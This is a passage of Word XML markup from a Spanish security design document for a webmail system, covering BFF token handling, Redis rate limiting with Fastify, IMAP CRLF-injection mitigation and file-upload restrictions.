        <w:t xml:space="preserve">El patrón de autenticación sigue el estándar Backend-for-Frontend (BFF) que Auth0, Clerk, Supabase y la mayoría de proveedores de autenticación modernos han adoptado como consenso en 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[44]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[57]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Access Token:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JWT firmado con RS256 (par de claves RSA-2048), tiempo de vida 15 minutos, almacenado exclusivamente en memoria del frontend (variable JavaScript, nunca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Se transmite en el header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;token&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Al cerrar o refrescar la página, el access token desaparece y debe recuperarse mediante un silent refresh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh Token:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Token opaco de 128 bits (no JWT), tiempo de vida 7 días, almacenado server-side en Redis con TTL automático (SETEX). Se entrega al cliente en una cookie HTTP-only, Secure, SameSite=Strict, con scope limitado al endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth/refresh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: refresh_token=&lt;opaque_token&gt;; HttpOnly; Secure; SameSite=Strict; Path=/auth/refresh; Max-Age=604800</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este diseño mitiga XSS de manera efectiva: un script malicioso no puede leer el refresh token porque es HttpOnly, y no puede extraer el access token de localStorage porque nunca se almacena allí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[44]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:id="138" w:name="X61ae7bb165c4bee9aa43dbaeee88c3e013316d9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.6 Rate limiting: Redis sliding window 99.997% precisión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los endpoints de autenticación e IMAP son objetivos prioritarios para ataques de fuerza bruta. Webmail 6.0 implementa rate limiting distribuido mediante Redis Sorted Sets (ZSET) usando el algoritmo sliding window, que según pruebas de Cloudflare alcanza un 99.997% de precisión con un consumo de memoria drásticamente inferior al de un log completo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[48]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[67]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El algoritmo opera como sigue: cada petición se registra en un ZSET con el timestamp como score. Antes de aceptar una nueva petición, se ejecuta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZREMRANGEBYSCORE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para eliminar entradas anteriores al inicio de la ventana temporal, y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZCARD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para contar las peticiones dentro de la ventana actual. Si el conteo excede el límite, la petición se rechaza con código 429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La configuración de Fastify utiliza el plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@fastify/rate-limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con backend Redis:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fastify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@fastify/rate-limit'</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100 requests por ventana</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">timeWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'1 minute'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redisClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Instancia ioredis</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">keyGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (req) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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'anonymous'</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errorResponseBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> context) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">statusCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">429</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'Too Many Requests'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retryAfter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">after</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los límites específicos por endpoint son: login (5 intentos/minuto por IP), refresh token (10/minuto por usuario), IMAP fetch (200/minuto por cuenta), búsqueda (60/minuto por usuario).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:bookmarkStart w:id="139" w:name="Xb5a67755612a9b76561f0ebea66ca82681c50ff"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.7 IMAP injection: validación estricta, stripping CRLF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La inyección de comandos IMAP ocurre cuando input del usuario se concatena directamente en comandos IMAP sin sanitización. CVE-2026-42258 en la librería</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">net-imap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de Ruby demostró que caracteres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CRLF) embebidos en argumentos de tipo Symbol permitían inyectar comandos IMAP arbitrarios, como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RENAME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, con los privilegios de la cuenta comprometida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[47]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 mitiga este riesgo en tres frentes: (1) toda interacción IMAP pasa por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">imapflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que nunca expone concatenación manual de comandos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (2) toda entrada de usuario que eventualmente se use en parámetros IMAP pasa por validación de whitelist que rechaza caracteres no alfanuméricos excepto puntos, guiones y arrobas en direcciones de email; (3) un paso de stripping elimina explícitamente todos los caracteres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(0x0D) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(0x0A) antes de cualquier operación IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[50]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkStart w:id="140" w:name="X7156ff5cc20bbc84abb19edb9f6d3a9bc388dc2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.8 Subida de archivos: límite 25MB, magic numbers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint de subida de archivos aplica las siguientes restricciones: tamaño máximo 25 MB (configurable), validación de magic numbers contra la extensión declarada, renombrado a UUID v4 para eliminar path traversal en nombres de archivo, almacenamiento en bucket S3 aislado sin capacidad de ejecución, y firma SHA-256 calculada en stream para detectar corrupción o manipulación durante la transferencia.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:id="145" w:name="arquitectura-de-autenticación-bff"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 Arquitectura de Autenticación BFF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El patrón Backend-for-Frontend (BFF) se ha consolidado en 2026 como el estándar de seguridad para SPAs que manejan datos sensibles. A diferencia del modelo tradicional donde tanto access como refresh tokens se almacenan en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vulnerable a XSS), el BFF almacena solo el access token en memoria volátil y mantiene el refresh token en una cookie HttpOnly inaccesible para JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[44]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[57]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="142" w:name="access-token-15-30-min-en-memoria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2.1 Access token 15-30 min en memoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El frontend almacena el JWT access token en una variable JavaScript (por ejemplo, en un closure o módulo ES6 no exportado). Este token tiene las siguientes características: algoritmo de firma RS256 con clave privada en el backend y clave pública rotativa; claims estándar (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) más claims de aplicación (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); tiempo de vida 15 minutos (900 segundos); claim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(JWT ID) único por token para permitir revocación puntual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al refrescar la página, el access token se pierde. El frontend ejecuta automáticamente un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">silent refresh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: realiza una petición POST al endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth/refresh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con la cookie HttpOnly que contiene el refresh token. Si el refresh token es válido y no ha sido revocado, el backend emite un nuevo par de tokens.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143" w:name="Xe740a7ba414b6039c8d1296d31422745b0f9ce2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2.2 Refresh token 7-14 días server-side Redis, HTTP-only cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El refresh token es un token opaco de 128 bits generado con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto.randomBytes(16).toString('hex')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Su ciclo de vida se gestiona completamente en el backend:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Almacenamiento en Redis con TTL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
